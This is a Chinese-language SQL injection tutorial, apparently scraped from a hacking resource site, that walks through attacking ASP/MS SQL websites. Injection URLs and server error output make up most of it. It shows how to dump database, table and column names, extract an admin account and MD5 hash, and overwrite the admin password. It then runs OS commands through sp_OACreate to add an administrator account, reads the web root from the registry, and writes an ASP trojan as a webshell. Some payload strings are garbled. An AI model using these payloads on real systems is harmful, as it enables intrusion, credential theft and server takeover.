更多sql注入信息请关注??????????????????????37网络技术网?www.37tk.com?你黑客路上的资源站?
两个论坛的库名.分别为: bbs2002 bbs
呵呵,论坛的库名出来啦!!!那我们就不客气了。就找BBS这个库吧! 任务二:得到bbs这个库中所有的表名. 先来第一句:
http://www.AAA.com/jump.asp?id=3400 and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=“U“)
查询的SQL语句,返回的是NAME的值然后和数字0比较,这样就会爆露出NAME的值.
好我们提交吧,只听到砰的一声!一个表名(name的值)出来了。名叫:Address. // 这里多说两句话,如果你提交的时候,他说你没有权限,就说明,这两个库的SQL账
//号的权限不一样,那就放弃吧。你没有资格进行下去. 老兄放弃吧!等他更新账号权
//的时候,我第一时间通知你!一定要相信我臭要饭的!话. 好,再来接着爆其他的表.
http://www.AAA.com/jump.asp?id=3400 and 0<>(select top 1 _ name from bbs.dbo.sysobjects where xtype=“U“ and name _ not in(“Address“))
又出来一个表名,名叫:admin
依次提交 ... and name not in(“address“,“admin“,..)) 可以查出所有的表名. 好,现在我们得到了ADMIN这个表,大家都清楚了这个表是做什么的吧!!我们的目的就是要得到这个表中账号字段和密码字段的值。
下面就是要得到这个表中的所有字段名了咧! 怎么得到字段名呢?系统表: syscolumns
中有用字段为: name、 id、colid 其中ID是保存着表的ID。也就是说我们要得到表的ID号然后,用SELECT * from bbs.dbo.syscolumns where id=bbs表的ID 这样才能列出BBS这个表中所有的字段. 说了半天,哎,说不清楚了。看我表演吧!
http://www.AAA.com/jump.asp?id=3400 and 0<>(select count(*)_ from bbs.dbo.sysobjects where xtype=“U“ and name=“admin“_ and uid>(str(id)))
//把ID值转成字符型后再和一个整型值比较。我KAO。经典吧,呵呵,这也想得出来。 (西安禾丰http://www.hf1997.com/).
又听到砰的一声!ID号出来了。值为:773577794 OK.GOOD!! 进入下关吧。
更多sql注入信息请关注??????????????????????37网络技术网?www.37tk.com?你黑客路上的资源站?
任务三:得到ADMIN这个表中的所有字段列表: http://www.AAA.com/jump.asp?id=3400 and 0<>(select top 1 _ name from BBS.dbo.syscolumns where id=773577794) 又是把NAME和数字比较.
IE 返回:adduser 呵呵,来来来。 http://www.AAA.com/jump.asp?id=3400 and 0<>(select top 1 _ name from BBS.dbo.syscolumns where id=773577794 and name _ not in(“adduser“))
又返回一个字段名:flag
http://www.AAA.com/jump.asp?id=3400 and 0<>(select top 1 _ name from BBS.dbo.syscolumns where id=773577794 and name _ not in(“adduser“,“flag“))
好当提交到:
http://www.AAA.com/jump.asp?id=3400 and 0<>(select top 1 _ name from BBS.dbo.syscolumns
where id=773577794 and name not in(“adduser“,“flag“,“id“,_ “lastlogin“,“lastloginip“,“password“,“username“))
IE返回:BOF 或 EOF 中有一个是\真\,或者当前的记录已被删除,所需的操作要求一个当前的记录。
说明,我们已经猜完了。呵呵,看到了吧。
把BBS库中的ADMIN表中的所有字段列出来了。 分别如下:
adduser,adduser,flag,id,lastlogin,lastloginip,password,username 看了一下,很像动网的论坛。
任务四:查询字段值.
来。我们看看username和password的值吧。
http://www.AAA.com/jump.asp?id=3400 and 0<(select id from _ BBS.dbo.admin where username>1) 账号出来了:youbiao
http://www.AAA.com/jump.asp?id=3400 and 0<(select id from _ BBS.dbo.admin where password>1 and username=“youbiao“)
密码又出来了:d6b2f32a47b8bcb5 我的天MD5的!不怕,呵呵~!!! 来。改一下他的密码:
http://www.AAA.com/jump.asp?id=3400;update BBS.dbo.admin _
set password=“AAABBBCCCDDDEEEF“ where username=“youbiao“;-- 呵呵,试试。成功了。我们再来给他改回来.
更多sql注入信息请关注??????????????????????37网络技术网?www.37tk.com?你黑客路上的资源站?
http://www.AAA.com/jump.asp?id=3400;update BBS.dbo.admin _ set password=“d6b2f32a47b8bcb5“ where username=“youbiao“;-- 又改回来咯!!!呵~!
通过提交UPDATE语句就可以直接把密码给他更改了。不过这是动网的。现在我们得到的只是后台的账号,你还是到前台去加一个用户为管理员才行。 这里,我们只是作测试,不破坏任何数据。 所以本文中的测试网址都更改过。请大家见谅!
[本文章还做了动画,不过测试动画用到的网站是国内一家大型游戏网站,所以这里不方便提示下载.请原谅.不明白的朋友请多看MSSQL相关帮助,学会自己独立分析和研究]
三、结束,闪人!:
这次测试是和黑夜一起测试的。其中用了不少心思。希望,大家不要利用本方法去破坏网络数据,希望看到本文章的朋友,如果自己的网站用了SQL数据库,请认真检查脚本提交的参数.
最新的研究技术.
1.在MSSQL查看系统和数据库信息。可以得到系统补丁情况和数据库版本. 2.可以得到MSSQL数据库当前连接的账号名,以及账号是什么权限. 3.查看一个MSSQL存储扩展过程是否存在.
4.通过有权限的MSSQL数据库账号可以得到WEB绝对路径的位置. 5.研究出怎么饶过脚本外部提交的限制.
6.给我一个MSSQL sysadmin账号我就一定可以给你一个系统管理员权限, 成功率99%.
正在研究的东西.
1.寻找DVBBS7.0的漏洞.
2.研究MSSQL查寻目录的方法.
3.研究怎么通过ACCESS数据库直接得到WEBSHELL的方法. 4.深入研究ACCESS没公开的函数,为注入服务. 其实以上的研究只有一个目的就是怎么得到WEBSHELL.
榨干MS SQL最后一滴血www.diybl.com 时间:2007-06-16 作者:佚名 编辑:本站 点击:
-风云变换的网络,网络安全让人们不能不关注它。数据库,让我们不得不想起强大的ORACLE,MS SQL。微软的漏洞最多,今天就用SQL INJECTION来让MS SQL为我们好好的工作。
更多sql注入信息请关注??????????????????????37网络技术网?www.37tk.com?你黑客路上的资源站?
以下(使用一知名网站作为测试点),相信大家对SQL爆库,爆表,爆字段都已掌握,在这里就不多说这方面了。 MS SQL内置函数介绍:
@@VERSION 获得Windows的版本号,MS SQL的版本号,补丁。 User_name() 得到当前系统的连接用户 Db_name() 得到当前连接的数据库 HOST_NAME() 得到当前主机的名称
这些信息有助我们对系统进行简单的了解 好,下面我们就开始吧!
语句: http://www.xxx.com/list.asp?classid=1'返回信息:Microsoft OLE DB Provider for SQL Server 错误 '80040e14' 字符串 ' Order By Id DESC' 之前有未闭合的引号。 /list.asp,行290
从这里未闭合的引号(“’”),我们可以确定存在SQL INJECTION。发现在漏洞当然接着走了,利用以上介绍的函数为我们工作了:
语句: http://www.xxx.com/list.asp?classid=1 and 0<>(select @@version)—返回: Microsoft OLE DB Provider for SQL Server 错误 '80040e07' 将 nvarchar 值 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' 转换为数据类型为 int 的列时发生语法错误。 /list.asp,行290
相关的信息出来了,MS SERVER ADVANCED SERVER 2000+SP4, SQL
2000+SP3,从MS SQL SERVER 后面的8.00.760可看出是SP3补丁。看了服务器的信息,接下应该了解数据库的权限了:
语句:http://www.xxx.com/list.asp?classid=1 and user_name()=’dbo’返回: 正常返回的信息
确定是权限是DBO,从表面DBO权限的连接用户经常是涉及SYSADMIN服务器角色成员。说明数据库服务器角色成员组默认是在每个数据库增加一个DBO用户。
返回原理根1=1,1=2相似..这里只是权限测试,我们也把它爆出来看看: 语句: http://www.xxx.com/list.asp?classid=1 and 0<>(select user_name())—返回: Microsoft OLE DB Provider for SQL Server 错误 '80040e07' 将 nvarchar 值 'dbo' 转换为数据类型为 int 的列时发生语法错误。 /list.asp,行290
说明连接数据库的用户权限很高,可以确定是服务器角色组中的成员。
语句:http://www.xxx.com/list.asp?classid=1 and 0<>(select db_name())—返回:Microsoft OLE DB Provider for SQL Server 错误 '80040e07' 将 nvarchar 值
'GameIMGSys' 转换为数据类型为 int 的列时发生语法错误。 /list.asp,行290 这样就可以爆出当前的数据库。得到这么高权限的数据库连接成员,我们当然想直接得到WEBSHELL,或是直接拿到NT ADMIN。NT ADMIN取决于当前服务器的配置,如果配置不合理的服务器,我们要直接拿NT ADMIN,拿NT ADMIN就要用到:
MSSQL内置存储过程: sp_OACreate (通过它,危害很得更大,但是需要有SYSADMINS权限才可能使用) sp_OAGetErrorInfo sp_OAGetProperty sp_OAMethod sp_OASetProperty sp_SetPropertysp_OAStop
由于MS SQL一次可以执行多语句,使得我们有机会使用更多的语句。
更多sql注入信息请关注??????????????????????37网络技术网?www.37tk.com?你黑客路上的资源站?
语句: http://www.xxx.com/list.asp?classid=1; DECLARE @shell INT EXEC SP_OACREATE 'wscripq.shell',@shell OUTPUT EXEC SP_OAMETHOD
@shell,'run',null, 'C:WINNTsystem32cmd.exe /c net user cntest chinatest /add'正常返回。(提示:如果主机上shell存在的话那将在服务器上创建一个cntest的用户) 创建用户了,语句后再加个net localgroup administrators cntest /add加到管理组中。 如果对方的机子开着3389端口,或IPC的话,那接下来的事,就不用我多说了。 遇到专业型主机,只开一个80端口,那应该怎么办呢?当然,我们还是可能拿到WEBSHELL,再慢慢渗透的。
由于权限高,我们可能先建表,写入ASP木马的数据再通过MAKEWEBTASK,得到WEBSEHLL.手工写入的程序太过于繁锁,上传WEBSHELL最大的问题还是网页目录,现在网上已经有现成的工具通过BACKUP,和MASKWEBTASK的工具得到WEBSHELL了。以下推荐,获取网页路径(通过存储过程达到对注册表的读取):
利用内置存储过程 xp_regread(读取注册表键值,权限public):
语句:http://www.xxx.com/list.asp?classid=1;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE',
@key='SYSTEMCurrentControlSetServicesW3SVCParametersVirtual Roots', @value_name='/', values=@test OUTPUT insert into paths(path) values(@test) IIS的默认路径的在注册表中HKEY_LOCAL_MACHINE
SYSTEMCurrentControlSetServicesW3SVCParametersVirtual Roots 利用爆字段将数据库的值读出来:
语句:http://www.xxx.com/list.asp?classid=1 and 0<>(select top 1 paths from
newtable)--返回: Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]将 varchar 值 'E:www,,201' 转换为数据类型为 int 的列时发生语法错误。
这说明网页目录在E:www,接下来也可以利用FSO直接写入ASP木马(提示必须拥用SYSADMIN权限才可使用FSO和FSO开入的前提下) : 语句:http:
//www.xxx.com/list.asp?class=1;declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripqing.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'e:wwwtest.asp',1 exec @ret = sp_oamethod @f, 'writeline', NULL, 'On Error Resume Next'--
在E:WWW下创建一个test.asp并写入On Error Resume next语句: http:
//www.xxx.com/list.asp?classid=1;declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripqing.filesystemobject', @o out exec sp_oamethod @o, 'opentextfile', @f out, 'e:wwwtest.asp',8 exec @ret = sp_oamethod @f, 'writeline', NULL, 'asp horse '—
在E:WWWtest.asp增加一行记录,记录为asp horse, 整个完整木马可能这样写入。(%百分号要用%替代写入)。如果得不到网页目录,怎么办呢?前提你要猜到网站是否使用默认WEB,或者使用域名作为WEB。
SQL注入经典教程(珍藏版)
